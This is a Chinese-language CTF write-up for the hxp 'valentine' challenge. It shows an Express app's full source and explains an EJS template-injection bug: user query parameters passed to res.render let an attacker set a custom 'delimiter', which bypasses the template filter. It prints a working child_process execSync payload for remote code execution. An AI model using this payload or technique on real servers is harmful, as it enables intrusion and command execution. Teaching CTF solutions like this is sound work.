拿到源码,是一个node.js写的后端,源码如下:
app.js:
var express = require('express');
var bodyParser = require('body-parser')
const crypto = require("crypto");
var path = require('path');
const fs = require('fs');
var app = express();
viewsFolder = path.join(__dirname, 'views');
if (!fs.existsSync(viewsFolder)) {
fs.mkdirSync(viewsFolder);
}
app.set('views', viewsFolder);
app.set('view engine', 'ejs'); //设置express使用的render engine
app.use(bodyParser.urlencoded({ extended: false }))
app.post('/template', function(req, res) {
let tmpl = req.body.tmpl;
let i = -1;
while((i = tmpl.indexOf("<%", i+1)) >= 0) {
if (tmpl.substring(i, i+11) !== "<%= name %>") {
res.status(400).send({message:"Only '<%= name %>' is allowed."});
return;
}
}
let uuid;
do {
uuid = crypto.randomUUID();
} while (fs.existsSync(`views/${uuid}.ejs`))
try {
fs.writeFileSync(`views/${uuid}.ejs`, tmpl);
} catch(err) {
res.status(500).send("Failed to write Valentine's card");
return;
}
let name = req.body.name ?? '';
return res.redirect(`/${uuid}?name=${name}`);
});
app.get('/:template', function(req, res) {
let query = req.query;
let template = req.params.template
if (!/^[0-9A-F]{8}-[0-9A-F]{4}-[4][0-9A-F]{3}-[89AB][0-9A-F]{3}-[0-9A-F]{12}$/i.test(template)) {
res.status(400).send("Not a valid card id")
return;
}
if (!fs.existsSync(`views/${template}.ejs`)) {
res.status(400).send('Valentine\'s card does not exist')
return;
}
if (!query['name']) {
query['name'] = ''
}
return res.render(template, query);
});
app.get('/', function(req, res) {
return res.sendFile('./index.html', {root: __dirname});
});
app.listen(process.env.PORT || 3000);
这道题的漏洞点在
return res.render(template, query);
template就是根据创建的ejs文件template.js,query就是用户的传参,这里的漏洞在于ejs允许自定义分隔符,like this:
// 单个模板文件
ejs.render('<?= users.join(" | "); ?>', {users: users},
{delimiter: '?'});
参考官网文档:https://ejs.bootcss.com/
比如说template.ejs文件的内容是<%= name %>,传参是?name=aaa,执行的命令就是ejs.render('<%= name %>',{name:aaa})
这道题tmpl传参控制了template.ejs的文件内容,且内容限制了以<%开头的字符串必须是<%= name %>,我们可以自定义分隔符,传参:?template=<*= global.process.mainModule.require('child_process').execSync('type flag.txt') *>,然后得到重定向链接,再传入?delimiter=*,就成功RCE了。
ps:这道题我是赛后使用windows复现的,所以使用的命令是type flag.txt
标签:return,name,res,app,valentine,ctf,hxp,template,ejs From: https://www.cnblogs.com/hackerone/p/17216027.html